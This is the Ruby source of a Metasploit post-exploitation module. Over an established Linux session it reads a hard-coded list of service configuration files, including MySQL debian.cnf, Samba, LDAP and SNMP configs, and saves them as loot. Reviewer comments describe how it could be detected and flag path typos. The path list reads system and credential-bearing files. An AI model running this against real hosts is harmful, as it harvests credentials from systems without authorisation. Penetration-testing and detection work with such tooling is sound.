GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/enum_configs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module that reads a fixed list of default-path service configuration
# files over an established Linux session and stores every non-empty result
# in the framework's loot store.
#
# Footprint, as far as this file shows: one read attempt per listed path, in
# list order, made through the session. The helpers it relies on (get_sysinfo,
# get_hostname, read_file, store_loot) are defined in the framework, not here.
# For detection work, a single process or user reading across this many
# unrelated service configs in quick succession is the observable pattern.
#
# The collected files can carry credentials and access-control settings
# (database client, SNMP, LDAP and Samba configs are on the list), so the
# resulting loot is sensitive engagement data.
class MetasploitModule < Msf::Post
  include Msf::Post::Linux::System

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied metadata merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather Configurations',
        'Description' => %q{
          This module collects configuration files found on commonly installed
          applications and services, such as Apache, MySQL, Samba, Sendmail, etc.
          If a config file is found in its default path, the module will assume
          that is the file we want.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'ohdae <bindshell[at]live.com>',
        ],
        'Platform' => %w[linux],
        'SessionTypes' => %w[shell meterpreter],
        # Declared as crash-safe with no side effects; the code below only
        # reads from the target and writes to the local loot store.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Entry point: prints the target's distribution version and kernel, then
  # hands over to {#find_configs}.
  def run
    sysinfo = get_sysinfo

    print_status("Running module against #{session.session_host} [#{get_hostname}]")
    print_status('Info:')
    %i[version kernel].each { |field| print_status("\t#{sysinfo[field]}") }

    vprint_status('Finding configuration files...')
    find_configs
  end

  # Stores one retrieved file as loot of type 'linux.enum.conf' and reports
  # where it was written.
  #
  # Only the basename is passed on as the loot filename. The path list holds
  # two sysctl.conf and two snmp.conf entries, so the name alone does not say
  # which remote file an item came from.
  # NOTE(review): passing the full remote path as store_loot's info argument
  # would keep that provenance for reporting.
  #
  # @param file [String] remote path the data was read from
  # @param data [String] file contents
  # @param ctype [String] content type recorded with the loot
  def save(file, data, ctype = 'text/plain')
    remote_name = ::File.basename(file)
    stored_at = store_loot('linux.enum.conf', ctype, session, data, remote_name)
    print_good("#{remote_name} stored in #{stored_at}")
  end

  # Walks the hard-coded path list, reads each file through the session and
  # saves whatever comes back non-empty.
  def find_configs
    # NOTE(review): /etc/security.access.conf looks like a typo of
    # /etc/security/access.conf, which is also listed - confirm.
    candidate_paths = %w[
      /etc/apache2/apache2.conf /etc/apache2/ports.conf /etc/nginx/nginx.conf
      /etc/snort/snort.conf /etc/mysql/my.cnf /etc/ufw/ufw.conf
      /etc/ufw/sysctl.conf /etc/security.access.conf /etc/shells
      /etc/security/sepermit.conf /etc/ca-certificates.conf /etc/security/access.conf
      /etc/gated.conf /etc/rpc /etc/psad/psad.conf /etc/mysql/debian.cnf
      /etc/chkrootkit.conf /etc/logrotate.conf /etc/rkhunter.conf
      /etc/samba/smb.conf /etc/ldap/ldap.conf /etc/openldap/openldap.conf
      /etc/cups/cups.conf /etc/opt/lampp/etc/httpd.conf /etc/sysctl.conf
      /etc/proxychains.conf /etc/cups/snmp.conf /etc/mail/sendmail.conf
      /etc/snmp/snmp.conf
    ]

    candidate_paths.each do |path|
      contents = read_file(path).to_s

      # Skip empty reads. The phrase check presumably filters shell error
      # text returned in place of file contents.
      # NOTE(review): a real config that contains this phrase is skipped too.
      next if contents.strip.empty? || contents.match?(/No such file or directory/)

      save(path, contents)
    end
  end
end